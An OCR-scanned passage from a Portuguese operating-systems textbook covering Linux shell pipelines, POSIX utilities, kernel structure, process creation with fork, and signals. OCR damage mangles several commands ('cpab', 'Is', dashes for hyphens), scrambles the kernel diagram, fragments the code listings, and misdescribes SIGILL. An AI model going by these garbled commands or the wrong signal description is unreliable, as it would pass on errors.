redirecionar ambos no mesmo comando. Por exemplo, 
o comando 


sort <in >out 


faz que sort tome sua entrada do arquivo in e escreva 
sua saída para o arquivo out. Como o erro padrão não 
foi redirecionado, quaisquer mensagens de erro vão 
para a tela. Um programa que lê sua entrada da entrada 
padrão realiza algum processamento sobre ele e escreve 
sua saída para a saída padrão é chamado de filtro. 

Considere a linha de comando a seguir consistindo 
de três comandos em separado: 


sort <in >temp; head —30 <temp; rm temp 


Ela primeiro executa sort, assumindo a entrada de 
in e escrevendo a saída para temp. Quando isso for 
completado, o shell executa head, dizendo-lhe para im- 
primir as primeiras 30 linhas de temp e imprimi-las na 
saída padrão, que vai então para o terminal. Por fim, o 


arquivo temporário é removido. Ele não é reciclado. Ele 
se vai para sempre. 

Ocorre frequentemente que o primeiro programa em 
uma linha de comando produz uma saída que é usada 
como entrada para o programa seguinte. No exemplo 
anterior, usamos o arquivo temp para conter a saída. No 
entanto, o Linux fornece uma construção mais simples 
para fazer a mesma coisa. Em 


sort <in | head —30 


a barra vertical, chamada símbolo pipe, diz para to- 
mar a saída de sort e usá-la como a entrada para head, 
eliminando a necessidade para criar, usar e remover o 
arquivo temporário. Uma coleção de comandos conec- 
tados por símbolos pipe, chamada de pipeline, pode 
conter arbitrariamente muitos comandos. Um pipeli- 
ne de quatro componentes é mostrado pelo exemplo 
a seguir: 


grep ter *.t I sort | head —20 | tail —5 >foo 


Aqui todas as linhas contendo a cadeia “ter” em to- 
dos os arquivos terminando em .¢ são escritas para saída 
padrão, onde elas são ordenadas. As primeiras 20 dessas 
linhas são selecionadas por head, que as passa para tail, 
que escreve as últimas cinco (isto é, linhas de 16 a 20 na 
lista ordenada) para foo. Esse é um exemplo de como o 
Linux fornece blocos de construção básicos (múltiplos 
filtros), em que cada um realiza uma tarefa, juntamente 
com um mecanismo para estruturá-los de maneiras qua- 
se ilimitadas. 

Linux é um sistema multiprogramado de propósito 
geral. Um único usuário pode executar vários progra- 
mas ao mesmo tempo, cada um como um processo se- 
parado. A sintaxe do shell para executar um processo no 
segundo plano é seguir o seu comando com um sinal de 


66499 


e” comercial (ampersand). Desse modo, 
wc -l <a >b & 


executa o programa de contagem de palavras, wc, para 
contar o número de linhas (flag —/) na sua entrada, a, 
escrevendo o resultado para b, mas o faz em segundo 
plano. Tão logo o comando tenha sido digitado, o shell 
mostra o prompt e está pronto para aceitar e lidar com 
o comando seguinte. Pipelines também podem ser colo- 
cados em segundo plano, por exemplo, por 


sort <x | head & 


Múltiplos pipelines podem executar no segundo pla- 
no simultaneamente. 

É possível colocar uma lista de comandos do shell 
em um arquivo e então inicializar um shell com esse 
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arquivo como a entrada padrão. O (segundo) shell 
apenas Os processa em ordem, a mesma que ele usaria 
com comandos digitados no teclado. Arquivos conten- 
do comandos de shell são chamados de scripts (rotei- 
ros) de shell. Scripts de shell podem designar valores 
para variáveis do shell e então lê-los posteriormente. 
Eles podem também ter parâmetros e usar construções 
if, for, while e case. Desse modo, um script de shells é, 
na realidade, um programa escrito em linguagem shell. 
O shell Berkeley C é um shell alternativo projetado 
para fazer script de shells (e a linguagem de comando 
em geral) parecerem programas C em muitos aspec- 
tos. Como o shell é apenas outro programa de usuário, 
outras pessoas escreveram e distribuíram uma série de 
outros shells. Os usuários são livres para escolher o 
shell que quiserem. 


10.2.4 Programas utilitários do Linux 


A interface do shell do Linux consiste em um gran- 
de número de programas utilitários padrão. De maneira 
geral, esses programas podem ser divididos em seis ca- 
tegorias, como a seguir: 


1. Comandos para manipulação de arquivos e 
diretórios. 

2. Filtros. 

3. Ferramentas de desenvolvimento de programas, 
como editores e compiladores. 

4. Processamento de texto. 

5. Administração de sistema. 

6. Miscelâneas. 


O padrão POSIX 1003.1-2008 especifica a sintaxe e 
semântica de aproximadamente 150 desses, fundamen- 
talmente nas primeiras três categorias. A ideia de padro- 
nizá-los é possibilitar a qualquer um escrever script de 
shells que usam esses programas e funcionam em todos 
os sistemas Linux. 

Além desses utilitários padrão, há muitos programas 
de aplicação também, é claro, como navegadores da 
web, players de mídia, visualizadores de imagem, office 
suites, jogos e assim por diante. 

Vamos considerar alguns exemplos desses progra- 
mas, começando com a manipulação de arquivos e 
diretórios. 


cpab 


copia o arquivo a para b, deixando o arquivo original 
intacto. Em comparação, 


mvab 
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copia a para b, mas remove o original. Na realidade, ele 
move o arquivo em vez de realmente fazer uma cópia no 
sentido usual. Varios arquivos podem ser concatenados 
usando cat, que lê cada um dos seus arquivos de entrada e 
copia todos para saída padrão, um depois do outro. Arqui- 
vos podem ser removidos pelo comando rm. O comando 
chmod permite que o proprietário mude os bits de direitos 
para modificar permissões de acesso. Diretórios podem 
ser criados com mkdir e removidos com rmdir. Para ver 
uma lista dos arquivos em um diretório, /s pode ser usada. 
Ela tem um vasto número de flags para controlar quantos 
detalhes sobre cada arquivo são mostrados (por exemplo, 
tamanho, proprietário, grupo, data de criação), a fim de 
determinar a ordem de apresentação (por exemplo, alfa- 
bética, por horário da última modificação, reversa), para 
especificar o layout na tela e muito mais. 

Já vimos vários filtros: grep extrai linhas contendo 
um determinado padrão da entrada padrão ou um ou 
mais arquivos de entrada; sort ordena sua entrada e a 
escreve na saída padrão; head extrai as linhas iniciais 
da sua entrada; tail extrai as linhas finais da sua entrada. 
Outros filtros definidos por 1003.2 são cut e paste, que 
permitem que colunas do texto sejam copiadas e cola- 
das em arquivos; od, que converte sua entrada (normal- 
mente binária) para texto ASCII, em octal, decimal ou 
hexadecimal; tr, que faz a tradução de caracteres (por 
exemplo, minúsculo para maiúsculo); e pr, que formata 
a saída para a impressora, incluindo opções para inserir 
cabeçalhos, números de páginas e assim por diante. 

Compiladores e ferramentas de programação in- 
cluem gcc, que chama o compilador C, e ar, que junta 
rotinas de biblioteca em arquivos comprimidos. 

Outra ferramenta importante é make, que é usada para 
manter grandes programas cujo código-fonte consiste em 
múltiplos arquivos. Em geral, alguns deles são arquivos 
de cabeçalho, que contêm tipos, variáveis, macros e ou- 
tras declarações. Os arquivos-fonte muitas vezes incluem 
a utilização de uma diretiva include especial. Dessa ma- 
neira, dois ou mais arquivos-fonte podem compartilhar 
das mesmas declarações. No entanto, se um arquivo de 
cabeçalho é modificado, é necessário encontrar todos os 
arquivos-fonte que dependem dele e recompilá-los. A 
função de make é rastrear qual arquivo depende de qual 
cabeçalho, e questões similares, e arranjar para que todas 
as compilações necessárias ocorram automaticamente. 
Quase todos os programas Linux, exceto os menores, são 
configurados para serem compilados com make. 

Uma seleção dos programas utilitários POSIX está 
listada na Figura 10.2, com uma descrição breve de 
cada um. Todos os sistemas Linux têm esses programas 
e muito mais. 


leao Alguns dos programas utilitários Linux comuns 
requeridos por POSIX. 










































































Programa Tipicamente 

cat Concatena vários arquivos para a saída-padrão 
chmod Altera o modo de proteção do arquivo 

cp Copia um ou mais arquivos 

cut Corta colunas de texto de um arquivo 

grep Procura um certo padrão dentro de um arquivo 
head Extrai as primeiras linhas de um arquivo 

Is Lista diretório 

make Compila arquivos e constrói um binário 

mkdir Cria um diretório 

od Gera uma imagem (dump) octal de um arquivo 
paste Cola colunas de texto dentro de um arquivo 

pr Formata um arquivo para impressão 

ps Lista os processos em execução 

rm Remove um ou mais arquivos 

rmdir Remove um diretório 

sort Ordena um arquivo de linhas alfabeticamente 
tail Extrai as últimas linhas de um arquivo 

tr Traduz entre conjuntos de caracteres 


10.2.5 Estrutura do núcleo 


Na Figura 10.1, vimos a estrutura global de um sis- 
tema Linux. Agora vamos examinar mais de perto o 
núcleo como um todo antes de estudar as várias par- 
tes, como o escalonamento de processos e o sistema de 
arquivos. 

O núcleo encontra-se diretamente sobre o hardware 
e possibilita interações com os dispositivos de E/S e 
a unidade de gerenciamento de memória, e controla 
o acesso da CPU a eles. No nível mais baixo, como 
mostrado na Figura 10.3, ele contém tratadores de 
interrupção, que são a principal maneira de interagir 
com dispositivos, e o mecanismo de despacho de bai- 
xo nível. Esse despacho ocorre quando acontece uma 
interrupção. O código de baixo nível para o proces- 
so em execução guarda o seu estado nas estruturas de 
processo do núcleo e inicializa o driver apropriado. 
O despacho de processo também acontece quando o 
núcleo completa algumas operações, momento em 
que um processo de usuário é iniciado novamente. O 


[eo WB] Estrutura do núcleo do Linux. 


Capítulo 10 ESTUDO DE CASO 1: UNIX, LINUX E ANDROID | 505 | 











Chamadas de sistemas 



























































































































































Componente Componente 
gerenciador gerenciador 
Componentes E/S de memoria de processo 
e ; ; A ES Memória Tratamento 
Sistema de arquivos virtual Saad de Sal 
Terminais || Soquetes Ria 
Ts Substituição Criação e 
E £| | Protocolos Camada de de páginas encerramento de 
is=|| derede | [Poco genérica pela paginação processosithreads 
as Escalonador 
i Drivers d de E/S 
Driver de F ve i © | | Drivers de Cache Escalonamento 
dispositivo de) | SISPOSIIVOS| | dispositivo de página da CPU 
UE derede de bloco E 
Interrupções Despachante 

















código de despacho está em linguagem de montagem 
e é bastante distinto do escalonamento. 

Em seguida, dividimos os vários subsistemas de 
núcleo em três componentes principais. O componen- 
te E/S na Figura 10.3 contém todos os fragmentos de 
núcleo responsáveis por interagir com dispositivos e re- 
alizar operações de E/S de rede e armazenamento. No 
nível mais alto, as operações de E/S são todas integra- 
das sob a camada VFS (Virtual File System — Sistema 
de arquivos virtual). Isto é, no nível mais alto, realizar 
uma operação de leitura em um arquivo, não importa se 
ele está na memória ou no disco, é o mesmo que reali- 
zar uma operação de leitura para recuperar um carac- 
tere de uma entrada do terminal. No nível mais baixo, 
todas as operações de E/S passam por algum driver de 
dispositivo. Todos os drivers Linux são classificados 
como drivers de dispositivos de caracteres ou drivers de 
dispositivos de blocos, a principal diferença é que bus- 
cas e acessos aleatórios são permitidos em dispositivos 
de bloco, e não em dispositivos de caracteres. Tecni- 
camente, dispositivos de redes são de fato dispositivos 
de caracteres, mas eles são tratados de modo um pouco 
diferente, então provavelmente é melhor que fiquem se- 
parados, como foi feito na figura. 

Acima do nível do driver do dispositivo, o código do 
núcleo é diferente para cada tipo de dispositivo. Disposi- 
tivos de caracteres podem ser usados de duas maneiras. 
Alguns programas, como em editores visuais, como vi e 
emacs, querem cada tecla pressionada individualmente. 


O terminal bruto de E/S (tty) torna isso possível. Outros 
softwares, como o shell, são orientados por linhas, per- 
mitindo que os usuários editem a linha inteira antes de 
pressionar ENTER para enviá-la para o programa. Nes- 
se caso, a cadeia de caracteres do dispositivo terminal é 
passada pelo que é chamado disciplina de linha, e uma 
formatação apropriada é aplicada. 

O software de rede é muitas vezes modular, com di- 
ferentes dispositivos e protocolos suportados. A camada 
acima dos drivers de rede lida com um tipo de função 
de roteamento, certificando-se de que o pacote certo 
vá para o dispositivo certo ou tratador de protocolo. A 
maioria dos sistemas Linux contém a funcionalidade 
completa de um roteador de hardware dentro do núcleo, 
embora o desempenho seja inferior ao de um roteador 
de hardware. Acima do código de roteador há a pilha de 
protocolo real, incluindo IP e TCP, mas também proto- 
colos adicionais. Acima de toda a rede há uma interface 
de soquete, que permite que os programas criem soque- 
tes para redes e protocolos em particular, retornando um 
descritor de arquivos para cada soquete usar mais tarde. 

No topo dos drivers de disco está o escalonador de 
E/S, que é responsável por ordenar e emitir solicitações 
de operações de disco de uma maneira que tente conser- 
var movimentos de cabeça de disco desperdiçados ou 
para atender alguma outra política de sistema. 

Bem no topo da coluna de dispositivos de bloco es- 
tão os arquivos de sistemas. O Linux pode, e na reali- 
dade tem, múltiplos sistemas de arquivos coexistindo 


506 | | SISTEMAS OPERACIONAIS MODERNOS 


simultaneamente. A fim de esconder as terriveis dife- 
renças arquitetônicas dos varios dispositivos de hard- 
ware da implementação do sistema de arquivos, uma 
camada de dispositivos de bloco genérica fornece uma 
abstração usada por todos os sistemas de arquivos. 

À direita na Figura 10.3 estão os outros dois compo- 
nentes-chave do núcleo Linux. Estes são responsáveis 
pelas tarefas de gerenciamento de memória e processo. 
Tarefas de gerenciamento de memória incluem manter 
os mapeamentos memória virtual para física, manter 
uma cache de páginas recentemente acessadas e imple- 
mentar uma boa política de substituição de páginas, as- 
sim como sob demanda trazer novas páginas de códigos 
e dados necessários para a memória. 

A principal responsabilidade do componente de ge- 
renciamento de processo é a criação e término de pro- 
cessos. Isso também inclui o escalonador de processos, 
que escolhe qual processo ou thread a ser executado em 
seguida. Como veremos na próxima seção, o núcleo do 
Linux trata ambos os processos e threads simplesmente 
como entidades executáveis, e os escalonará com base 
em uma política de escalonamento global. Por fim, o 
código para o tratamento de sinais também pertence a 
esse componente. 

Embora os três componentes sejam representados em 
separado na figura, eles são altamente interdependentes. 
Sistemas de arquivos costumam acessar arquivos por 
meio de dispositivos de bloco. No entanto, a fim de es- 
conder as grandes latências de acessos de disco, arquivos 
são copiados na cache de páginas na memória principal. 
Alguns arquivos podem ser até dinamicamente criados 
e ter apenas uma representação na memória, como os 
que oferecem alguma informação de uso de recursos em 
tempo de execução. Além disso, o sistema de memória 
virtual pode contar com uma partição de disco ou área de 
troca de arquivos para criar cópias de partes da memória 
principal quando ele precisa liberar determinadas páginas 
e, portanto, conta com o componente de E/S. Existem vá- 
rias outras interdependências. 

Além dos componentes estáticos no núcleo, o Linux 
dá suporte a módulos dinamicamente carregáveis. Esses 
módulos podem ser usados para acrescentar ou substi- 
tuir os drivers de dispositivos padrão, sistema de arqui- 
vos, rede, ou outros códigos-núcleo. Os módulos não 
são mostrados na Figura 10.3. 

Por fim, bem no topo está a interface de chamadas 
de sistema para o núcleo. Todas as chamadas de sistema 
vêm até essa área, provocando um desvio que chaveia 
a execução do modo usuário para o modo núcleo pro- 
tegido e passa o controle para um dos componentes do 
núcleo descritos anteriormente. 


10.3 Processos no Linux 


Nas seções anteriores, começamos examinando o 
Linux como visto do teclado, isto é, o que o usuário 
vê em uma janela xterm. Demos exemplos de coman- 
dos shell e programas utilitários que são usados fre- 
quentemente. Terminamos com uma breve visão geral 
da estrutura do sistema. Agora chegou o momento de 
nos aprofundarmos no núcleo e olhar mais de perto os 
conceitos básicos a que o Linux dá suporte, a saber, pro- 
cessos, memória, o sistema de arquivos e entrada/saída. 
Essas noções são importantes porque as chamadas de 
sistema — a interface do próprio sistema operacional 
— as manipulam. Por exemplo, chamadas de sistema 
existem para criar processos e threads, alocar memória, 
abrir arquivos e realizar E/S. 

Infelizmente, com tantas versões do Linux, há algu- 
mas diferenças entre elas. Neste capítulo, enfatizaremos 
as características comuns a todas elas em vez de nos 
concentrarmos em qualquer versão específica. Assim, 
em determinadas seções (especialmente as de imple- 
mentação), a discussão pode não se aplicar igualmente 
a todas as versões. 


10.3.1 Conceitos fundamentais 


As principais entidades ativas em um sistema Linux 
são os processos. Os processos Linux são muito simila- 
res aos processos sequenciais clássicos que estudamos no 
Capítulo 2. Cada processo executa um único programa e 
inicialmente tem um único thread de controle. Em outras 
palavras, ele tem um contador de programa, que controla 
a próxima instrução a ser executada. O Linux permite que 
um processo crie threads adicionais uma vez inicializado. 

O Linux é um sistema multiprogramado, de maneira 
que múltiplos processos interdependentes podem estar 
executando ao mesmo tempo. Além disso, cada usuário 
pode ter vários processos ativos ao mesmo tempo, de 
maneira que em um grande sistema pode haver centenas 
ou mesmo milhares de processos executando. Na rea- 
lidade, na maioria das estações de trabalho de usuário 
único, mesmo quando o usuário está ausente, dúzias de 
processos de segundo plano, chamados daemons, estão 
executando. Esses processos são iniciados por um script 
de shell quando o sistema é inicializado. (“Daemon” é 
uma variação ortográfica de “demon”, um espírito do 
mal que age por conta própria.) 

Um daemon típico é o cron daemon. Ele desperta 
uma vez por minuto para conferir se há algum traba- 
lho para fazer. Se houver, ele realiza o trabalho. Então 


ele volta a dormir até chegar o momento da próxima 
verificação. 

Esse daemon é necessário porque no Linux é pos- 
sível agendar atividades a serem realizadas minutos, 
horas, dias ou mesmo meses depois. Por exemplo, su- 
ponha que um usuário tenha uma consulta no dentista às 
15 h da próxima terça-feira. Ele pode fazer uma entrada 
no banco de dados do cron daemon dizendo para o dae- 
mon acionar um alarme às 14h30min. Quando o dia e 
a hora agendados chegam, o cron daemon vê que tem 
trabalho a fazer e inicia o programa de alarme como um 
novo processo. 

O cron daemon também é usado para iniciar ativi- 
dades periódicas, como fazer backups de disco diários 
às 4h00, ou lembrar a usuários esquecidos todos os 
anos em 31 de outubro para fazer um estoque de balas e 
bombons para o Halloween. Outros daemons cuidam do 
correio eletrônico que chega e sai, gerenciam a fila na 
impressora, conferem se há páginas livres suficientes na 
memória e assim por diante. Daemons são diretos para 
implementar no Linux, pois cada um é um processo se- 
parado, independente de todos os outros processos. 

Processos são criados no Linux de uma maneira espe- 
cialmente simples. A chamada de sistema fork cria uma 
cópia exata do processo original. O processo criador é 
chamado de processo pai. O novo processo é chamado 
de processo filho. Cada um tem suas próprias imagens 
de memória privadas. Se o pai subsequentemente mudar 
qualquer uma de suas variáveis, as mudanças não serão 
visíveis para o filho e vice-versa. 

Arquivos abertos são compartilhados entre pai e 
filho. Isto é, se um determinado arquivo foi aberto no 
processo pai antes de fork, ele continuará aberto tanto 
no pai quanto no filho depois. Mudanças feitas no ar- 
quivo por qualquer um serão visíveis para o outro. Esse 
comportamento é apenas razoável, pois essas mudanças 
também são visíveis para qualquer processo não rela- 
cionado que abrir o arquivo. 

O fato de as imagens de memória, variáveis, regis- 
tradores e tudo mais serem idênticos no processo pai 
e no filho leva a uma pequena dificuldade: como os 


eit tEn Criação de processo no Linux. 


pid = fork( ); 
if (pid < 0) { 

handle error ( ); 
} else if (pid > 0) { 
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processos sabem quem deve executar o código pai e 
quem deve executar o código filho? O segredo é que a 
chamada de sistema fork retorna um O para o filho e um 
valor diferente de zero, o PID (Process Identifier — 
Identificador de processo) do filho, para o pai. Ambos 
os processos em geral conferem o valor de retorno e 
agem conforme mostrado na Figura 10.4. 

Processos são chamados por seus PIDs. Quando um 
processo é criado, o pai recebe o PID do filho, como já 
mencionado. Se o filho quiser saber seu próprio PID, 
há uma chamada de sistema, getpid, que o fornece. 
PIDs são usados de uma série de maneiras. Por exem- 
plo, quando um filho termina, o pai recebe o PID desse 
processo-filho. Isso pode ser importante, porque um pai 
pode ter muitos filhos. Como filhos também podem ter 
filhos, um processo original pode construir uma árvore 
inteira de filhos, netos e mais descendentes. 

Processos no Linux podem comunicar-se uns com 
os outros usando uma forma de troca de mensagens. É 
possível criar um canal entre dois processos no qual um 
processo pode escrever um fluxo de bytes para o outro 
ler. Esses canais são chamados pipes. A sincronização 
é possível porque, quando um processo tenta ler a partir 
de um pipe vazio, ele é bloqueado até que os dados es- 
tejam disponíveis. 

Os pipelines do shell são implementados com pipes. 
Quando o shell vê uma linha como 


sort <f | head 


ele cria dois processos, sort e head, e estabelece um 
pipe entre eles de tal maneira que a saída padrão de sort 
esteja conectada com a entrada padrão de head. Desse 
modo, todos os dados que sort escreve vão diretamente 
para head, em vez de ir para um arquivo. Se o pipe en- 
cher, o sistema para de executar sort até que head tenha 
removido alguns dados dele. 

Processos também podem comunicar-se de outra 
maneira além dos pipes: interrupções de software. Um 
processo pode enviar o que é chamado de um sinal para 
outro processo. Processos podem dizer ao sistema o que 
eles querem que aconteça quando um sinal for recebido. 


/* se o fork tiver exito, o processo pai obtera pid > 0*/ 


/* o fork falhou (por exemplo, a memoria ou alguma tabela esta cheia) */ 


/* codigo do pai segue aqui./ */ 


} else { 


/* codigo do filho segue aqui./ */ 
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As escolhas disponíveis são ignorá-lo, pegá-lo ou deixar 
que o sinal elimine o processo. Terminar o processo é o 
padrão para a maioria dos sinais. Se um processo elege 
pegar sinais enviados para si, ele deve especificar uma 
rotina de tratamento de sinais. Quando um sinal chega, o 
controle vai passar abruptamente para o tratador. Quando 
o tratador tiver terminado e retornar, o controle volta para 
seu lugar de origem, análogo às interrupções de E/S de 
hardware. Um processo pode enviar sinais apenas para 
membros do seu grupo de processos, que consiste em 
seu pai (e ancestrais mais distantes), irmãos e filhos (e 
descendentes mais distantes). Um processo pode também 
enviar um sinal para todos os membros do seu grupo de 
processos com uma única chamada de sistema. 

Sinais também são usados para outros fins. Por 
exemplo, se um processo está realizando aritmética de 
ponto flutuante e inadvertidamente faz uma divisão por 
0 (algo que não agrada nem um pouco aos matemáti- 
cos), resulta em um sinal SIGFPE (exceção de ponto 
flutuante). Alguns dos sinais que são exigidos pelo PO- 
SIX estão listados na Figura 10.5. Muitos sistemas Li- 
nux têm sinais adicionais também, mas os programas 
que os utilizam podem não ser portáteis para outras ver- 
sões do Linux e UNIX em geral. 


10.3.2 Chamadas de sistema para gerenciamento 
de processos no Linux 


Vamos agora examinar as chamadas de sistema Li- 
nux que lidam com gerenciamento de processos. As 


[FIGURA 10.5] Alguns dos sinais exigidos por POSIX. 


principais estão listadas na Figura 10.6. Fork é um bom 
lugar para se começar a discussão. A chamada de sis- 
tema fork, que conta com o suporte de outros sistemas 
UNIX tradicionais, é a principal maneira de criar um 
novo processo nos sistemas Linux. (Discutiremos outra 
possibilidade na seção a seguir.) Ela cria uma duplica- 
ta do processo original, incluindo todos os descritores 
de arquivos, registradores e tudo mais. Após o fork, o 
processo original e a cópia (o pai e o filho) seguem ca- 
minhos distintos. Todas as variáveis têm valores idên- 
ticos no momento do fork, mas como todo o espaço de 
endereçamento é copiado para criar o filho, mudanças 
subsequentes em um deles não afetam o outro. A cha- 
mada fork retorna um valor, que é zero no filho, igual ao 
PID do filho no pai. Usando o PID retornado, os dois 
processos podem ver quem é o pai e quem é o filho. 
Na maioria dos casos, após um fork, o filho preci- 
sará executar um código diferente do pai. Considere o 
caso do shell. Ele 16 um comando do terminal, cria um 
processo filho, espera pelo filho para executar o coman- 
do e então lê o comando seguinte quando o filho ter- 
mina. Para esperar que o filho termine, o pai executa 
uma chamada de sistema waitpid, que apenas espera até 
o filho terminar (qualquer filho, se houver mais de um). 
Waitpid tem três parâmetros. O primeiro permite que o 
chamador espere por um filho específico. Se ele for —1, 
qualquer filho de qualquer idade (isto é, o primeiro filho 
a terminar) servirá. O segundo parâmetro é o endereço 
de uma variável que receberá o estado de saída do fi- 
lho (término normal ou anormal e valor de saída). Isso 















































Sinal Efeito 
SIGABRT | Enviado para abortar um processo e forçar o despejo de memória (core dump) 
SIGALRM | O alarme do relógio disparou 
SIGFPE Ocorreu um erro de ponto flutuante (por exemplo, divisão por 0) 
SIGHUP A linha telefônica que o processo estava usando caiu 
SIGILL O usuário pressionou a tecla DEL para interromper o processo 
SIGQUIT O usuário pressionou uma tecla solicitando o despejo de memória 
SIGKILL Enviado para matar um processo (não pode ser capturado ou ignorado) 
SIGPIPE O processo escreveu em um pipe que não tem leitores 
SIGSEGV | O processo referenciou um endereço de memoria inválido 
SIGTERM | Usado para requisitar que um processo termine elegantemente 
SIGUSR1 Disponível para propósitos definidos pela aplicação 
SIGUSR2 | Disponível para propósitos definidos pela aplicação 
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aeii: TE Algumas chamadas ao sistema relacionadas com processos. O código de retorno s é —1 quando ocorre um erro, pid é o ID 
do processo e residual é o tempo restante no alarme anterior. Os parâmetros são aqueles sugeridos pelos próprios nomes. 





Chamada de sistema 


Descrição 





pid = fork() 


Cria um processo filho idêntico ao pai 





pid = waitpid(pid, &statloc, opts) 


Espera o processo filho terminar 





s = execve(name, argv, envp) 
exit(status) 
s = sigaction(sig, &act, &oldact) 


s = sigreturn(&context) 


Substitui a imagem da memória de um processo 
Termina a execução de um processo e retorna status 
Define a ação a ser tomada nos sinais 


Retorna de um sinal 





s = sigprocmask(how, &set, &old) 


Examina ou modifica a máscara do sinal 





s = sigpending(set) 


Obtém o conjunto de sinais bloqueados 





s = sigsuspend(sigmask) 


Substitui a máscara de sinal e suspende o processo 








s = kill(pid, sig) 


Envia um sinal para um processo 





residual = alarm(seconds) 


Ajusta o alarme do relógio 











s = pause() 


Suspende o chamador até o próximo sinal 








permite que o pai saiba o destino do seu filho. O terceiro 
parâmetro determina se o chamador bloqueia ou retorna 
se nenhum filho já tiver sido terminado. 

No caso do shell, o processo filho deve executar o 
comando digitado pelo usuário. Ele faz isso usando a 
chamada de sistema exec, que faz que sua imagem de 
núcleo inteira seja substituída pelo arquivo nomeado 
em seu primeiro parâmetro. Um shell altamente simpli- 
ficado ilustrando o uso de fork, waitpid e exec é mostra- 
do na Figura 10.7. 

No caso mais geral, exec tem três parâmetros: o 
nome do arquivo a ser executado, um ponteiro para 
o conjunto de argumentos e um ponteiro para o con- 
junto ambiente. Em breve os descreveremos. Vários 


ein TEA Um shell altamente simplificado. 


while (TRUE) { 


type_prompt( ); 
read command(command, params); 


pid = fork( ); 

if (pid < 0) { 
printf("Unable to fork.\n"); 
continue; 


if (pid != 0) { 

waitpid (—1, &status, 0); 
yelse { 

execve(command, params, 0); 


procedimentos de biblioteca, como execl, execv, execle 
e execve são fornecidos para permitir que parâmetros 
sejam omitidos ou especificados de diversas maneiras. 
Todos esses procedimentos invocam a mesma chamada 
de sistema subjacente. Embora a chamada de sistema 
seja exec, não há um procedimento de biblioteca com 
esse nome; um dos outros tem de ser usado. 

Vamos considerar o caso de um comando digitado 
para o shell, como 


cp file1 file2 


usado para copiar file] para file2. Após o shell ter criado 
um filho, este localiza e executa o arquivo cp e lhe passa 
a informação sobre os arquivos a serem copiados. 


/* repete para sempre /*/ 
/* mostra o prompt na tela */ 
/* le a linha de entrada do teclado */ 


/* cria um processo filho */ 


/* condicao de erro */ 
/* repete o laco */ 


/* pai espera o filho */ 


/* filho traz o trabalho */ 
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O principal programa de cp (e muitos outros progra- 
mas) contém a declaração de função. 


main(argc, argv, envp) 


em que argc é uma contagem do número de itens na 
linha de comando, incluindo o nome do programa. Para 
o exemplo anterior, argc é 3. 

O segundo parâmetro, argv, é um ponteiro para um 
conjunto. O elemento 7 do conjunto é um ponteiro para a 
i-ésima cadeia na linha de comando. No nosso exemplo 
argv[0] apontaria para a cadeia de dois caracteres “cp”. 
Similarmente, argv[1] apontaria para a cadeia de cinco 
caracteres “filel” e argv[2] apontaria para a cadeia de 
cinco caracteres “file2”. 

O terceiro parâmetro de main, envp, é um ponteiro 
para o ambiente, um conjunto de cadeias contendo de- 
signações da forma nome = valor usadas para passar 
informações como tipo de terminal e nome do diretório- 
-raiz para um programa. Na Figura 10.7, nenhum am- 
biente é passado para o filho, de maneira que o terceiro 
parâmetro de execve é um zero nesse caso. 

Se execve parece complicado, ele é a chamada de 
sistema mais complexa. Todo o resto é muito mais 
simples. Como um exemplo de uma chamada simples, 
considere exit, que os processos devem usar quando ter- 
minam de executar. Ele tem um parâmetro, o estado de 
saída (0 a 255), que é retornado ao pai na variável status 
da chamada de sistema waitpid. O byte de baixa ordem 
de status contém o estado de término, com 0 sendo o 
término normal e os outros valores sendo várias condi- 
ções de erro. O byte de alta ordem contém o estado de 
saída do filho (0 a 255), como especificado na chamada 
do filho para exit. Por exemplo, se um processo pai exe- 
cuta o comando 


n = waitpid(-1, &status, 0); 


ele será suspenso até que algum processo filho termine. 
Se o filho sair com, digamos, 4 como parâmetro para 
exit, o pai será desperto com n configurado para o PID 
do filho e status configurado para 0x0400 (0x como um 
prefixo significa hexadecimal em C). O byte de baixa 
ordem de status relaciona-se aos sinais; o seguinte é o 
valor que o filho retornou em sua chamada para exit. 
Se um processo sai e seu pai ainda não esperou por 
ele, o processo entra em uma espécie de animação sus- 
pensa chamada de estado zumbi — os mortos vivos. 
Quando o pai por fim espera por ele, o processo termina. 
Várias chamadas de sistema relacionam-se com os 
sinais, que são usados de uma série de maneiras. Por 
exemplo, se um usuário acidentalmente diz a um editor 
de texto para exibir o conteúdo inteiro de um arquivo 


muito longo, e então percebe o erro, o editor deve ser 
interrompido. A escolha em geral é o usuário digitar al- 
guma tecla especial (por exemplo, DEL ou CTRL-C), 
que envia um sinal para o editor. O editor captura o sinal 
e interrompe a apresentação. 

Para anunciar sua vontade de capturar esse (ou qual- 
quer outro) sinal, o processo pode usar a chamada de 
sistema sigaction. O primeiro parâmetro é o sinal a ser 
pego (ver Figura 10.5). O segundo é um ponteiro para 
uma estrutura dando um ponteiro para o procedimen- 
to lidando com o sinal, assim como outros bits e flags. 
O terceiro aponta para uma estrutura na qual o sistema 
retorna informações sobre o tratamento de sinais reali- 
zado atualmente, caso ele precise ser restaurado mais 
tarde. 

O tratador de sinais pode executar pelo tempo que 
ele quiser. Na prática, no entanto, tratadores de sinais 
costumam ser relativamente curtos. Quando o procedi- 
mento de tratamento de sinais é concluído, ele retorna 
para o ponto do qual ele foi interrompido. 

A chamada de sistema sigaction também pode ser 
usada para fazer que um sinal seja ignorado, ou para 
restaurar a ação padrão, que é matar o processo. 

Digitar a tecla DEL não é a única maneira de se en- 
viar um sinal. A chamada de sistema kill permite que um 
processo sinalize outro relacionado. A escolha do nome 
“kill” para essa chamada de sistema não é especialmen- 
te boa, já que a maioria dos processos envia sinais para 
outros com a intenção de que eles sejam capturados. No 
entanto, um sinal que não é capturado mata, realmente, 
o recipiente. 

Para muitas aplicações de tempo real, um processo 
precisa ser interrompido após um intervalo de tempo 
específico para fazer algo, como retransmitir um pacote 
potencialmente perdido através de uma linha de comu- 
nicação inconfiável. Para lidar com essa situação, foi 
fornecida a chamada de sistema alarm. O parâmetro 
especifica um intervalo, em segundos, após o qual um 
sinal SIGALRM é enviado para o processo. Um pro- 
cesso pode ter apenas um alarme pendente a qualquer 
momento. Se uma chamada alarm for feita com um pa- 
râmetro de 10 segundos, e então 3 segundos mais tarde 
outra chamada alarm for feita com um parâmetro de 20 
segundos, apenas um sinal será gerado, 20 segundos 
após a segunda chamada. O primeiro sinal é cancelado 
pela segunda chamada para alarm. Se o parâmetro para 
alarm for zero, qualquer sinal de alarme pendente é can- 
celado. Se um sinal de alarme não for capturado, a ação 
padrão é tomada e o processo sinalizado é morto. Tec- 
nicamente, sinais de alarme podem ser ignorados, mas 


não faz sentido fazer isso. Por que um programa pediria 
para ser sinalizado mais tarde e então ignoraria o sinal? 
